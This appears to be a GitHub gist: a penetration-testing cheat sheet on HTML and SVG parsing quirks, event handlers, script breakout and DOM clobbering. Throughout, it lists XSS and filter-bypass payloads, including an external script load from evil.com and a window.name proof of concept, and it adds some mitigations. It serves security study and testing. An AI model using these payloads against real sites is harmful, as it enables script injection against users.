Skip to content

Instantly share code, notes, and snippets.

@aravindkumarsvg
Last active November 11, 2025 09:40
Show Gist options
  • Select an option

  • Save aravindkumarsvg/eb50c0729370fbee223b85ee344e4ac8 to your computer and use it in GitHub Desktop.

Select an option

Save aravindkumarsvg/eb50c0729370fbee223b85ee344e4ac8 to your computer and use it in GitHub Desktop.
HTML Quirks and XSS Cheat Sheet

πŸ› οΈ HTML Quirks and XSS Cheat Sheet

A reference of quirks, behaviors, and security-relevant properties in HTML5 + SVG, useful for penetration testing, payload crafting, and filter bypass research.


HTML Elements Parsing quirks - link mXSS CheatSheet


πŸ“Œ 1. Event Handler Quirks

Event Elements Allowed Notes
onload <body>, <img>, <iframe>, <link>, <script>, <style>, <object>, <embed>, <video>, <audio>, <input type=image> Fires when resource loads successfully
onerror <img>, <script>, <link>, <audio>, <video>, <object>, <embed>, <iframe> Fires on load failure, very common XSS sink
onunload <body> Fires when leaving a page
onbeforeunload <body> Prompts before page exit
onmouseover, onmouseout, onclick Almost any visible element Used in svg, a, button, etc.
onanimationstart, onanimationend, onanimationiteration Elements with CSS animations applied CSS-based triggers
onfocus, onblur Interactive elements (input, textarea, button, a, iframe) Can trigger by script focus
onresize <body>, <iframe>, <svg> Fires on dimension changes
onhashchange window (not element) Fires on URL fragment change

πŸ“Œ 2. Attribute Quirks

Attribute Elements Quirk / Behavior
src <img>, <iframe>, <script>, <audio>, <video>, <embed>, <track> Accepts data: URLs, blob: URLs
srcset <img>, <source> Can bypass naive filters (chooses best candidate)
href <a>, <link>, <area>, <base> Supports javascript: scheme unless blocked
action <form> Accepts javascript: URIs in some browsers
style Global Can embed expression() in old IE, url(javascript:...) blocked in modern
value <input>, <option>, <textarea> Can be injected into DOM/text directly
poster <video> Resource fetch + onerror possible
srcdoc <iframe> Inline HTML execution (mini sandbox)
contenteditable Global Editable area that can inject HTML
autofocus <input>, <textarea>, <button> Steals focus automatically
download <a> Forces file download, name override
formaction <button>, <input type=submit/image> Overrides parent <form action>

πŸ“Œ 3. SVG-Specific Quirks

Element Attribute Quirk
<svg> xmlns, xmlns:xlink Enables XML + JS namespaces
<a> href / xlink:href Supports navigation, animatable
<animate> attributeName Modifies host element’s attributes (can overwrite href)
<set> attributeName Instantly sets a host element’s attribute
<foreignObject> Allows embedding full HTML inside SVG Executes HTML in SVG context
<script> Inline JS Executes unless CSP blocks
<use> xlink:href to reference symbols Can link external SVG with script
<image> href Loads external resource, onerror available

πŸ“Œ 4. HTML Element Families with Quirks

Media & Embeds

  • <img> β€” supports onerror, onload, srcset, sizes
  • <iframe> β€” srcdoc, onload, navigation quirks
  • <object> / <embed> β€” loads arbitrary resources, MIME-sniffing issues
  • <video> / <audio> β€” multiple event hooks (oncanplay, onerror, etc.)
  • <track> β€” loads external file, can trigger fetch
Element Quirk / Behavior Notes
<img> Triggers onerror when loading fails Commonly used for XSS payloads
<img> Supports srcset / sizes, multiple load sources Could bypass naive filters
<iframe> onload fires when src loads, or empty src loads parent again Useful for injection & self-DOS
<iframe> Navigates sandboxed content unless restricted Used in clickjacking, data exfiltration
<video> onerror, oncanplay events fire Can embed <track> with extra URLs
<audio> Similar to <video> with source fallback onerror triggers
<object> Can load arbitrary URLs, including data URIs Often disabled via CSP
<embed> Same as <object>, legacy plugin behavior CSP needed

Forms

  • <input type=image> β€” submits click coordinates
  • <input> β€” autofocus, formaction
  • <textarea> β€” unescaped reflection vector
  • <form> β€” action=javascript:... in some browsers
  • β€” Defaults to type=submit if omitted, Can break app logic

Scripting

  • <script> β€” classic inline execution
  • <noscript> β€” executes content if JS disabled
  • <template> β€” inert until cloned, can be abused

Interactive

  • <details> / <summary> β€” built-in toggle UI
  • <marquee> β€” deprecated but still rendered in Chromium
  • <base> β€” changes global relative URL resolution
  • (IE only) β€” Auto-plays sound from URL Rare but dangerous
  • β€” Can import attacker CSS CSS injection β†’ data exfiltration

πŸ“ Text & Metadata Elements

Element Quirk / Behavior Notes
<title> Contents reflected in browser chrome Can be abused for phishing UI
<style> Can embed @import url(javascript:...) in older browsers Modern browsers block JS schemes
<meta http-equiv=refresh> Triggers auto navigation Old-school redirect payload
<meta name=referrer> Controls outgoing Referer header Useful for privacy / CSRF
<meta http-equiv=content-security-policy> Can inject a CSP if allowed Dangerous if misused

πŸ“Œ 5. Properties & Edge Cases

  • Case insensitivity: HTML tags & attributes are case-insensitive (<ScRiPt> works), SVG is case-sensitive.
  • Null byte / encoding quirks: Some parsers mishandle %00, %0d%0a.
  • Whitespace quirks: Tabs, newlines, or backticks can sometimes bypass regex-based filters.
  • Data URIs: Work across many elements; data:text/html,<script>alert(1)</script> is classic.
  • CSP interactions: Some quirks still work under weak CSP if not covering data:, blob:, inline event handlers.

🧩 Quirks of <head> and Head-Related Tags

1. <head> Itself

  • Normally contains metadata (not rendered visually).

  • Script execution still works inside <head>.

  • Injection quirks:

    • If you can inject before closing </head>, you can add new tags (<script>, <style>, <meta>, etc.).
    • Some browsers auto-close <head> if unexpected tags appear, which moves your payload into <body>.

2. <title>

  • Displays in the browser tab and search results.

  • Quirks:

    • Only text is allowed; HTML tags are rendered as plain text.

    • Useful for reflected XSS detection: if input shows up inside <title>, you can’t execute JS directly, but you can break out of <title> and inject a <script> or other element.

    • Example:

      </title><script>alert(1)</script>

3. <style>

  • Used for CSS rules.

  • Quirks:

    • Does not allow JS directly.

    • CSS injection possible (e.g., leaking data via url() or abusing expression() in old IE).

    • Example:

      <style>
        body { background:url("javascript:alert(1)") } /* IE only */
      </style>
    • In modern browsers: look for CSS-based exfiltration instead.


4. <meta>

  • Defines metadata (charset, viewport, redirects, etc.).

  • Quirks:

    • <meta http-equiv="refresh"> can trigger client-side redirects:

      <meta http-equiv="refresh" content="0;url=javascript:alert(1)">

      🚨 Works in old browsers, mostly blocked in modern ones.

    • <meta charset> can be abused in XSS polyglots:

      • Different charsets (UTF-7, Shift-JIS) may cause misinterpretation of payload.

5. <link>

  • Defines external resources (CSS, icons, prefetch).

  • Quirks:

    • <link rel="stylesheet" href="javascript:alert(1)">

      Used to work in IE, not in modern browsers.

    • <link rel="import" href="..."> (deprecated HTML Imports) could include scripts.


6. <script>

  • Inline JavaScript executes immediately:

    <script>alert(1)</script>
  • External JavaScript via src= attribute.

  • Quirks:

    • Can bypass some filters with lesser-known attributes:

      <script/src=//evil.com></script>
    • MIME-type quirks in some browsers (e.g., text/html executed as JS in old versions).


7. <base>

  • Defines the base URL for all relative links.

  • Quirk:

    • If attacker can inject <base href="http://evil.com/">, all relative URLs resolve against attacker’s domain.
    • Useful for phishing & injection chaining.

8. <noscript>

  • Displays fallback content when JS is disabled.

  • Quirks:

    • Can contain HTML β†’ payload may render as normal HTML if JS disabled, or ignored if enabled.
    • Useful in polyglots for dual-context execution.

9. <object>, <embed>, <applet> (rarely used but allowed in <head>)

  • Historically abused to load external resources.

  • Examples:

    <object data="javascript:alert(1)"></object>
    <embed src="data:text/html,<script>alert(1)</script>"></embed>

βœ… Summary: If injection lands inside <head>, try:

  • Breaking out with </tag> and injecting <script> or <meta http-equiv="refresh">.
  • Abuse <base> to hijack relative paths.
  • Abuse <style> for CSS injection.
  • Abuse <title> for detection and filter evasion.

Quirks of the <meta> Tag in HTML

The <meta> tag is normally used in the <head> of an HTML document to define metadata about the page. However, it comes with several quirks and special behaviors depending on the attribute and browser implementation.


1. Charset Declaration

<meta charset="UTF-8">
  • Must be inside <head>.
  • Declares the encoding of the document.
  • Quirk: If multiple <meta charset> tags exist, the first one takes precedence.

2. Refresh / Redirect

<meta http-equiv="refresh" content="5; url=https://example.com">
  • Refreshes the page after N seconds.

  • Can redirect the user to another URL.

  • Quirk: Some browsers allow javascript: inside the url attribute in older versions:

    <meta http-equiv="refresh" content="0;url=javascript:alert(1)">

    Modern browsers usually block this.


3. Content-Security-Policy (CSP)

<meta http-equiv="Content-Security-Policy" content="default-src 'self'">
  • Defines security policies.
  • Quirk: Only effective when placed in the <head> before any script execution.

4. X-UA-Compatible (IE Quirk)

<meta http-equiv="X-UA-Compatible" content="IE=edge">
  • Forces Internet Explorer to render in a specific mode.
  • Quirk: If placed after other elements, it may not work.

5. Viewport (Mobile Rendering)

<meta name="viewport" content="width=device-width, initial-scale=1.0">
  • Controls scaling and layout on mobile devices.
  • Quirk: Multiple viewport tags can cause unpredictable rendering behavior.

6. Open Graph & Social Media Tags

<meta property="og:title" content="Example Title">
  • Used by Facebook, Twitter, LinkedIn for link previews.
  • Quirk: Duplicate Open Graph tags β†’ undefined behavior (usually first wins).

7. MIME-Type Sniffing Control

<meta http-equiv="X-Content-Type-Options" content="nosniff">
  • Prevents MIME type sniffing in browsers.
  • Quirk: Must be served from HTTP headers to be fully effective; <meta>-based usage is ignored in some cases.

8. Cookie Setting (Old Quirk)

<meta http-equiv="Set-Cookie" content="session=12345; path=/">
  • Used in older browsers to set cookies.
  • Quirk: No longer supported in modern browsers.

9. Other Rarely Used http-equiv Values

  • default-style β†’ Chooses a preferred stylesheet.
  • refresh β†’ Page auto-reload.
  • cache-control β†’ Legacy cache instructions.

Security Implications

  • Redirects: <meta http-equiv="refresh"> can be abused for phishing.
  • CSP: Weak CSP in <meta> is bypassable if not placed first.
  • Charset Mismatch: Can cause XSS via misinterpreted encodings.

βœ… Summary:

  • <meta> has quirks tied mostly to http-equiv.
  • Some attributes (refresh, charset, X-UA-Compatible) behave differently depending on browser and placement.
  • Many legacy quirks are still relevant for security testing (redirects, cookie setting, charset confusion).

HTML Syntax Quirks

This document lists quirks in HTML parsing that browsers "fix" automatically. These quirks are often exploited for XSS bypasses.


1. Slash Inside Tags

Browsers accept / as a separator inside tag names.

<img/src/onerror=prompt(8)>
<img src/onerror=prompt(8)>

βœ… Both interpreted as <img src onerror=prompt(8)>.


2. Alias Tags

Some tags have aliases or equivalent meanings.

<image src=q onerror=prompt(8)>

βœ… <image> is treated as <img> in HTML5.


3. Unfinished or Broken Closing Tags

Browsers repair broken closing tags.

</scrip</script>t><img src=q onerror=prompt(8)>

βœ… Normalized as:

</script><img src=q onerror=prompt(8)>

4. Attribute Value Quirks

Extra spaces or missing quotes are tolerated.

<img src = q onerror=prompt(8)>

βœ… Same as <img src=q onerror=prompt(8)>.


5. Tag Auto-Correction

Browsers auto-correct invalid case and some typos.

<imG>      β†’ <img>
<imaage>   β†’ ignored (invalid)
<image>    β†’ <img>

6. Mixed-Case Attributes

Event attributes and tag names are case-insensitive.

<ImG SrC=x OnErRoR=prompt(8)>

βœ… Works the same as <img src=x onerror=prompt(8)>.


7. SVG Namespaces

SVG allows unusual tag names and attributes.

<svg/onload=prompt(8)>

βœ… Works in browsers that parse it as <svg onload=prompt(8)>.


Summary of Common Quirks

  • / inside tags is allowed.\
  • <image> works like <img>.\
  • Broken tags like </scrip</script>t> are repaired.\
  • Attribute spacing and quoting are optional in many cases.\
  • Tags and attributes are case-insensitive.\
  • SVG allows alternate parsing contexts.

HTML Event Handler Quirks

This document explores quirks in how browsers interpret event handler attributes (e.g., onload, onerror), and how attackers may exploit inconsistencies in parsing, escaping, and case-sensitivity.


1. General Quirks

Case-Insensitivity

  • HTML attribute names are case-insensitive.

  • Examples:

    <img OnLoAd=alert(1) src=x>
    <img ONERROR=alert(1) src=x>

Encoding / Escaping

  • Event attributes can be encoded using HTML entities, Unicode escapes, or mixed.

  • Examples:

    <img src=x &#x6f;nerror=alert(1)>   <!-- "onerror" using hex entity -->
    <img src=x o
    error=alert(1)>   <!-- using JavaScript escape -->
    <img src=x ΞΏnerror=alert(1)>       <!-- using homoglyph "ΞΏ" (Greek omicron) -->

Attribute Splitting

  • Browsers sometimes treat / or unusual placement as attribute delimiters.

  • Examples:

    <img/src/onerror=alert(1)>
    <img src/onerror=alert(1)>

Broken Tag Parsing

  • Browsers attempt to "fix" broken markup and continue parsing.

  • Examples:

    </scrip</script>t><img src=x onerror=alert(1)>

2. Element-Specific Event Quirks

<img>

  • onerror triggers if the image fails to load.

  • Tricks:

    <img src=q onerror=alert(1)>
    <img/src/onerror=alert(1)>
    <img src= onerror=alert(1)>
    <image src=q onerror=alert(1)>

<svg>

  • SVG supports many event quirks:

    • onload on <svg> root
    • Animations modifying attributes (<animate>, <set>)
    • Namespaced attributes (some bypass filters)
  • Examples:

    <svg onload=alert(1)>
    <svg><a><animate attributeName=href values=javascript:alert(1) /></a></svg>

<iframe>

  • onload triggers once the frame loads.

  • Examples:

    <iframe src=javascript:alert(1)>
    <iframe onload=alert(1)>

<body>

  • Supports onload, onunload, onresize, etc.

  • Example:

    <body onload=alert(1)>

<input> / Form Elements

  • Autofocus + events can trigger XSS on navigation with #id.

  • Example:

    <input autofocus onfocus=alert(1)>

3. Payload Examples

Encoded Events

<img src=x &#111;nerror=alert(1)>

Split Attributes

<img/src/onerror=alert(1)>

Case Variants

<img oNlOaD=alert(1) src=x>

Broken Tags

</scrip</script>t><img src=x onerror=alert(1)>

4. Notes

  • Browsers behave differently:
    • Chrome is stricter with malformed entities than Firefox.
    • Legacy IE accepted even stranger quirks (e.g., backticks).
  • Modern CSP (Content Security Policy) and sanitizers often aim to block these, but filter bypasses still exist in weakly-protected apps.

πŸ”— HTML & SVG Attribute Equivalents / Alternatives Cheatsheet

A quick reference for VAPT engineers to bypass weak filters by leveraging alternate or lesser-known attributes that achieve the same effect.


1. Navigation / Linking

Main Attribute Equivalent / Variant Notes
href (<a>, <link>) xlink:href (SVG <a>, <use>, <image>) Many filters block href but forget xlink:href.
src (<img>, <script>, <iframe>, <audio>, <video>) xlink:href (SVG <image>, <script>) Both load external resources.
formaction (<button>, <input type="submit">) action (<form>) Defines where form submits.
poster (<video>) src (<img>) Can trick scanners that only check <img src>.

2. Embedding / Including External Resources

Main Attribute Equivalent / Variant Notes
srcdoc (<iframe>) data: URI in src Inline HTML injection vector.
data (<object>) src (<embed>, <iframe>) Both can embed resources.
codebase (<object>, deprecated) archive (<applet>, deprecated) Old but sometimes still parsed.

3. Image / Media Loading

Main Attribute Equivalent / Variant Notes
srcset (<img>) src Browser picks source depending on screen size.
poster (<video>) src (<img>) Poster can embed attacker-controlled images.
background (<body>, deprecated) style="background:url(...)" Legacy background loading.

4. Event Handlers

Main Attribute Equivalent / Variant Notes
onload (<img>, <iframe>, <script>) onerror (<img>, <video>, <audio>) onerror often less filtered.
onclick onfocus, onmouseover, onpointerdown Same interaction goal.
onanimationstart onbegin (SVG <animate>) Timing-based triggers.

5. Form Inputs

Main Attribute Equivalent / Variant Notes
value (<input>, <option>) defaultValue (<input>) Some filters ignore defaults.
name id Some backends bind values by either.
action (<form>) formaction (<button>, <input type=submit>) Submission control bypass.

6. Metadata / Redirection

Main Attribute Equivalent / Variant Notes
<meta http-equiv="refresh"> <meta http-equiv="location"> (non-standard) Open redirect tricks.
<meta http-equiv="set-cookie"> document.cookie (via JS) Cookie manipulation.

βœ… Why this matters in VAPT

Many filters only blacklist common attributes (href, src, onload). Knowing their cousins / aliases lets you bypass weak sanitizers. For example:

  • If href is blocked β†’ try xlink:href in <svg><a>.
  • If onload is blocked β†’ use onerror in <img>.
  • If src is blocked β†’ abuse data in <object> or poster in <video>.

πŸ› οΈ HTML Attribute Quirks Cheatsheet: accesskey & canonical

This cheatsheet covers quirks and abuse scenarios related to the accesskey attribute and the <link rel="canonical"> tag.
Useful for VAPT engineers who need quick recall of edge cases.


1. accesskey Attribute

πŸ”Ή What It Does

  • Assigns a keyboard shortcut to an element (anchor, button, input, etc.).
  • Example:
    <a href="https://example.com" accesskey="x">Go</a>
    β†’ Pressing Alt+Shift+X (Chrome/Windows) will activate the link.

πŸ”Ή Browser Support / Quirks

Browser Shortcut Combination Notes
Chrome (Win/Linux) Alt + Shift + key Overrides some native keys.
Firefox (Win/Linux) Alt + Shift + key Slightly different per locale.
Safari (macOS) Ctrl + Option + key Conflicts with screen readers.
IE/Edge (Legacy) Alt + key β†’ then Enter Quirky and inconsistent.

πŸ”Ή Security / Abuse Potential

  • UI Redressing / Clickjacking: Attacker assigns accesskey to force user-triggered navigation when pressing normal shortcuts (Alt+F4, Alt+Tab, etc.).
  • Shortcut Collision: Can hijack common accessibility shortcuts, confusing visually impaired users.
  • Phishing: Hidden accesskey triggers redirect (<a href="http://evil.com" accesskey="h">).
  • CSRF Vector: If shortcut triggers POST form submission β†’ may cause silent CSRF when user accidentally presses key combo.
  • Privilege Escalation: If bound to admin-only functionality (e.g., β€œDelete user” button), it can be abused if misconfigured.

2. <link rel="canonical"> Tag

πŸ”Ή What It Does

  • Declares the preferred (canonical) URL of a page for SEO indexing.
  • Example:
    <link rel="canonical" href="https://example.com/page">

πŸ”Ή Quirks & Risks

  1. Open Redirect via Canonical

    <link rel="canonical" href="https://evil.com/">
    • If an app reflects unvalidated user input here, it becomes a redirect vector.
    • Search engines may send traffic to attacker site.
  2. SEO Poisoning

    • If attacker can inject their own canonical link:
      • Victim page is de-indexed in favor of attacker’s page.
      • Useful in phishing campaigns.
  3. Bypassing URL Filters

    • Some crawlers or scanners respect canonical URLs.
    • Pentesters can test URL normalization issues.
  4. Canonicalization Collisions

    • Example:
      <link rel="canonical" href="https://example.com/%2e%2e/admin">
    • Browsers and search engines may interpret differently β†’ bypass filters.
  5. XSS Vector (rare)

    • Some old HTML sanitizers failed to handle <link> properly.
    • Example payload:
      <link rel="canonical" href="javascript:alert(1)">
    • Most modern browsers ignore javascript: here, but worth testing.

βœ… VAPT Takeaways

  • accesskey

    • Check for unexpected keyboard hijacking or hidden shortcuts.
    • Can be abused for CSRF triggers and UX redressing.
    • Test across different OS/browser combos (shortcut differences).
  • canonical

    • Validate href β†’ must be same-origin and absolute.
    • Look for open redirect or SEO poisoning vectors.
    • Normalize and compare encoded URLs (%2e%2e, //, etc.).
    • Treat any user-controlled canonical link as a red flag.

HTML Spacing Quirks Cheatsheet

This cheatsheet covers quirks in HTML parsing related to spacing between attributes and tags, useful for VAPT engineers.


1. Multiple Spaces Between Attributes

HTML parsers collapse multiple spaces into a single space.

<img        src="X"        onerror="alert(1)">

βœ… Still works.


2. Newlines Between Attributes

Newlines are also treated as whitespace.

<img
   src="X"
   onerror="alert(1)">

βœ… Still works.


3. Tabs / Form Feeds

Tabs, form feeds, and other whitespace characters are allowed between attributes.

<img    src="X" onerror="alert(1)">

βœ… Still works.


4. No Space Between Attributes

Even without space, HTML parsers correctly separate attributes as long as the value is closed with quotes.

<img src="X"onerror="alert(1)">

βœ… Works in HTML.

❌ Fails in XML/XHTML, since whitespace between attributes is required.


5. No Space Between Tag Name and Attribute

This is invalid in HTML parsing:

<imgsrc="X">        <!-- considered invalid -->

Correct form:

<img src="X">

6. Mixed Case Attribute Names

HTML is case-insensitive for attribute names.

<img SRC="X" ONERROR="alert(1)">

βœ… Works.


7. Attribute Value Without Quotes

Quotes around values are optional if the value has no spaces or special characters.

<img src=X onerror=alert(1)>

βœ… Works.

But fails if value has space:

<img src=hello world> <!-- breaks -->

8. Spacing Before/After Equal Sign

Browsers allow spaces around the = sign.

<img src = "X" onerror = "alert(1)">

βœ… Works.


9. Trailing Slash Quirks

<img src="X" onerror="alert(1)"/>

βœ… Works in HTML5 (trailing slash ignored).
❌ In XHTML, trailing slash required for self-closing.


10. Important Note: HTML vs.Β XML

  • HTML is lenient with spacing quirks.\
  • XML/XHTML is strict --- attributes must be separated by whitespace, quoted properly, and case-sensitive.

Key Exploit Payload Example

<img src="X"onerror="alert(document.domain)">

βœ… Bypasses some filters that expect space before event handlers.


Script Breakout Quirks in HTML/JavaScript

Script breakout refers to techniques where injected data inside a <script> block prematurely closes the script context and executes arbitrary HTML/JS. This is highly relevant in XSS testing.


1. Basic Script Breakout

<script>
var a = '</script><img src=x onerror=alert(1)>';
</script>
  • The injected </script> ends the script tag.
  • This happens because closing script tag </script> present inside the javascript string is parsed in the html context
  • Remaining payload is parsed as HTML β†’ leads to XSS.

2. Breaking Out of Strings

<script>
var data = 'test';
var a = '</script><img src=x onerror=alert(1)>';
</script>
  • Injection inside JS string contexts (', ", or `) can be broken out with quotes before adding </script>.

Example:

<script>
var a = 'evil'; // attacker input
// attacker sends: ';</script><img src=x onerror=alert(1)>'
</script>

3. Comment-Based Breakout

<script>
// attacker payload:
  var x = '</script><!-- <img src=x onerror=alert(1)>';
</script>
  • Uses HTML comments ('<!--') to avoid breaking parsing in certain contexts.

4. Escaping Using Encodings

  • Breakout payloads can be encoded:

    • HTML entities: </scr&#x69;pt>
    • Unicode escapes: </scr\u0069pt>
    • Base64 inside data URIs

Example:

<script>
var a = '</scr\u0069pt><img src=x onerror=alert(1)>';
</script>

5. Nested Breakouts

<script>
var a = '</scr</script>ipt><img src=x onerror=alert(1)>';
</script>
  • Some parsers may interpret nested breakouts differently.
  • Can bypass naive sanitizers.

6. JSON & Script Breakouts

<script>
var json = '{"key": "</script><img src=x onerror=alert(1)>"}';
</script>
  • Injection inside JSON strings embedded in JS can still allow breakout.

7. Template Literals & Breakout

<script>
let tpl = `</script><img src=x onerror=alert(1)>`;
</script>
  • Backticks (`) open up another injection surface.

Security Implications

  • Script breakout is one of the most powerful forms of XSS.

  • Works even when inside JavaScript contexts, as long as attacker can insert </script>.

  • Defenses:

    • Use strict output encoding based on context.
    • Never directly embed untrusted data inside <script>.
    • Prefer safe JSON serialization with application/json responses.

βœ… Summary:

  • Script breakout relies on </script> injection.
  • Works in strings, comments, JSON, template literals.
  • Encodings and nested forms help evade filters.
  • Must always be checked during VAPT for XSS vectors.

HTML & JavaScript Reference Quirks

1. Referencing Elements by id

  • Elements with an id become accessible in JavaScript via:

    document.getElementById("myId")
  • Historically (quirk): some browsers also expose id values as global variables:

    <div id="myDiv"></div>
    console.log(myDiv); // <div id="myDiv">

    ⚠️ Not reliable, but still seen in old code.


2. Referencing Elements by name

  • Form controls with a name can be accessed directly:

    <input type="text" name="username">
    document.forms[0].username.value
  • In legacy behavior, name values were exposed as globals:

    console.log(username); // [object HTMLInputElement]

3. Referencing Forms

  • Forms are accessible via document.forms (HTMLCollection):

    document.forms["loginForm"]
  • Inputs can be accessed directly through their parent form:

    document.forms["loginForm"].password.value

4. Iframes Referencing

  • If an iframe has id or name, it can be referenced like:

    <iframe id="childFrame" name="childFrame"></iframe>
    window.frames["childFrame"]
    window.childFrame // via name as global (quirky legacy)
    document.getElementById("childFrame").contentWindow

5. Accessing Iframe Documents

  • From parent β†’ iframe:

    let iframe = document.getElementById("childFrame");
    iframe.contentWindow.document
    iframe.contentDocument // alias in many browsers
  • From iframe β†’ parent:

    window.parent.document
    window.top.document // top-level document
  • From iframe β†’ itself:

    window.frameElement // the <iframe> element inside parent

6. Other Properties of Iframes

  • contentWindow β†’ The window object of the iframe.
  • contentDocument β†’ The document object inside iframe.
  • window.frames β†’ Array-like collection of iframes.
  • frameElement β†’ Inside iframe, references the <iframe> element embedding it.
  • window.top β†’ The topmost browsing context.
  • window.parent β†’ Direct parent browsing context.

7. Legacy & Quirky Behaviors

  • Browsers may auto-expose id and name attributes of iframes as global variables:

    <iframe name="legacyFrame"></iframe>
    console.log(legacyFrame); // <iframe name="legacyFrame">
  • This can lead to conflicts if the id/name matches a real variable.

  • Modern best practice: always use document.getElementById or window.frames.


βœ… Key Takeaways

  • id and name can leak into global scope (quirky legacy behavior).
  • Forms auto-expose their elements by name.
  • Iframes can be accessed from both parent and child via contentWindow, contentDocument, frameElement.
  • Same-origin policy limits actual access: if iframe is cross-origin, contentDocument and most properties throw security errors.

<base target> β†’ sets window.name (short PoC)

Short: A <base target="NAME"> where NAME is not a reserved keyword (_self, _blank, _parent, _top) becomes a named browsing context. Pages opened using that base will have window.name = "NAME" (even cross-origin).

PoC

1) page-set.html β€” page that sets the base target and links:

<!doctype html>
<html>
<head>
  <meta charset="utf-8">
  <base target="attacker_window">
  <title>Base Target Setter</title>
</head>
<body>
  <a href="https://example.com" id="link">Open example.com</a>
  <p>Click the link to open example.com in a window named "attacker_window".</p>
</body>
</html>

2) page-read.html β€” page you can open in the named window to check window.name (host anywhere, e.g., serve locally):

<!doctype html>
<html>
<head><meta charset="utf-8"><title>Read window.name</title></head>
<body>
  <h1>window.name = <span id="n"></span></h1>
  <script>
    document.getElementById('n').textContent = window.name || '(empty)';
    console.log('window.name =>', window.name);
  </script>
</body>
</html>

Quick test

  1. Serve page-set.html (e.g., python3 -m http.server 8000) and open it.
  2. Click the link β€” it opens https://example.com in a tab/window named attacker_window.
  3. In that new tab, open devtools console and run window.name β€” it should print "attacker_window".
  4. Alternatively, navigate that window to your page-read.html to see the name rendered.

Notes & Mitigation

  • Do not reflect untrusted values into <base target>.
  • Remove or sanitize <base> from user-submitted HTML.
  • Avoid using window.name for sensitive data; clear it early if you control the page.

πŸ”Ή HTML form & target Attributes Cheatsheet

form attribute

  • Used on <input> / <button> to bind them to a <form> element by id, even if they are placed outside.

Example:

<form id="mainForm" action="/submit">
  <input type="text" name="username">
</form>

<button type="submit" form="mainForm">Submit (outside form)</button>

action attribute (and default behavior)

  • Defines the URL where form data is sent.
  • If omitted β†’ form submits to the same page/URL where it resides.

Example:

<form method="post">
  <input type="text" name="data">
  <button type="submit">Submit</button>
</form>

➑️ Submits to the current page’s URL.


Extra form* attributes

  • formaction β†’ overrides action on specific submit button.
  • formmethod β†’ overrides method (GET/POST).
  • formenctype β†’ overrides enctype (e.g., multipart/form-data).
  • formtarget β†’ overrides target for a specific button.
  • formnovalidate β†’ skips HTML5 validation for that button.

Example:

<form action="/default" method="post">
  <input type="email" name="email" required>
  <button type="submit">Normal Submit</button>
  <button type="submit" formaction="/alt" formmethod="get" formnovalidate>
    Alternate Submit
  </button>
</form>

target attribute

Specifies where to display the result of form submission or link navigation. Applies to: <form>, <a>, <area>, <base>, <button type="submit">.

Standard values:

  • _self β†’ default, same tab/frame.
  • _blank β†’ new tab/window.
  • _parent β†’ parent browsing context (if inside iframe).
  • _top β†’ full window, breaks out of iframes.

Custom values:

  • Any other string (e.g. reportFrame, customWin) β†’ opens/reuses a named browsing context.
  • That name becomes the new window’s window.name.

⚑ Quirk: target sets window.name

If you use a non-standard value in target, the opened window inherits that string as its window.name β€” even for cross-origin pages.

PoC:

<form action="https://example.com" method="get" target="attackerWin">
  <button type="submit">Open Example</button>
</form>
  • When submitted, https://example.com opens in a new window/tab.
  • That window’s window.name is now "attackerWin".
  • Later navigation in that tab retains the same window.name.

🧭 HTML Element Properties & Attribute Quirks Cheatsheet

πŸ“˜ Developer + Security Reference


🧩 1. Overview

Every HTML element has two related but distinct layers when accessed via JavaScript:

Layer Accessed via Description
Attribute element.getAttribute() / .setAttribute() The literal HTML markup string value
Property element.propertyName The DOM’s live JS object representation

Example:

<input id="x" type="checkbox" checked>
<script>
  const el = document.getElementById("x");
  console.log(el.getAttribute("checked")); // "": attribute exists
  console.log(el.checked); // true (boolean property)
</script>

🧱 2. Attribute vs Property Differences

Concept Attribute Property
Storage In HTML markup In the DOM object
Type Always string Typed (boolean, number, object, etc.)
Reflects changes? No, unless explicitly linked Sometimes
Example el.getAttribute('value') el.value

πŸ”„ 3. Common Reflected Attributes

Element Attribute ↔ Property Mapping
<input> value, checked, disabled, type, name
<a> href, target, rel
<img> src, alt, width, height
<textarea> value, rows, cols
<option> value, selected, label
<form> action, method, target, elements

⚠️ Quirk Example

el.setAttribute("value", "foo"); // updates attribute only
console.log(el.value); // still the live value property, may differ!

🧠 4. Element Property Accessors

Property Description Notes
innerHTML HTML inside element Executes script on assignment (dangerous)
outerHTML Entire element HTML Replaces node when set
textContent Plain text (no markup) Safe from HTML parsing
innerText Visible text (layout-dependent) Slower, triggers reflow
classList Token list of classes Add/remove/toggle easily
dataset Map of data-* attributes Converts data-user-id β†’ el.dataset.userId
style Inline CSS style object Live reflection of inline styles
attributes NamedNodeMap of all attributes Iteration may differ by browser

🧩 5. Live vs Static Collections

Method Returns Live?
document.getElementsByTagName() HTMLCollection βœ… Live
document.getElementsByClassName() HTMLCollection βœ… Live
document.querySelectorAll() NodeList ❌ Static
element.children HTMLCollection βœ… Live
element.childNodes NodeList βœ… Live

Quirk

const list = document.getElementsByTagName('div');
document.body.appendChild(document.createElement('div'));
console.log(list.length); // updated automatically!

βš™οΈ 6. Boolean Attribute Rules

Boolean attributes are true if present, regardless of value.

<input type="checkbox" checked="false">
<script>
  console.log(document.querySelector('input').checked); // true
</script>
Examples Behavior
disabled, checked, readonly, multiple Presence β†’ true
Removing attribute β†’ false el.removeAttribute('disabled')

🧩 7. Case Sensitivity & Normalization

  • HTML attributes are case-insensitive, DOM properties are case-sensitive.
  • el.getAttribute("CLASS") β†’ returns same as "class".
  • But el["CLASS"] β†’ undefined.
  • DOM converts names to lowercase internally for HTML (but not XML).

πŸ’¬ 8. Attribute Serialization Quirks

Operation Result
el.outerHTML Serializes current DOM, not original HTML
el.cloneNode(true) Copies attributes & properties
JSON.stringify(el) Returns {} (non-enumerable properties)

🧩 9. Dataset (data-*) Attributes

<div id="box" data-user-id="42" data-role="admin"></div>
<script>
  const el = document.getElementById('box');
  console.log(el.dataset.userId); // "42"
  el.dataset.role = "moderator";
</script>
Attribute Access via JS Reflects back?
data-user-id="42" el.dataset.userId βœ… Yes
data-user_name="a" el.dataset.user_name ❌ Underscores not camelized

⚠️ 10. Security Quirks (XSS / DOM Clobbering)

🧨 10.1 Dangerous Setters

Property Risk Example
innerHTML XSS injection el.innerHTML = userInput;
outerHTML XSS injection, node replaced
srcdoc (iframe) Inline document injection iframe.srcdoc = userInput;
on* handlers Executes arbitrary code el.onclick = eval("...")

🧨 10.2 DOM Clobbering

If user input creates element IDs/names matching global variables, JS can be overridden.

<form name="login">
  <input name="document" value="pwned">
</form>
<script>
  console.log(document); // now references <input>, not the global document!
</script>

βœ… Mitigations

  • Always use textContent instead of innerHTML when inserting untrusted text.
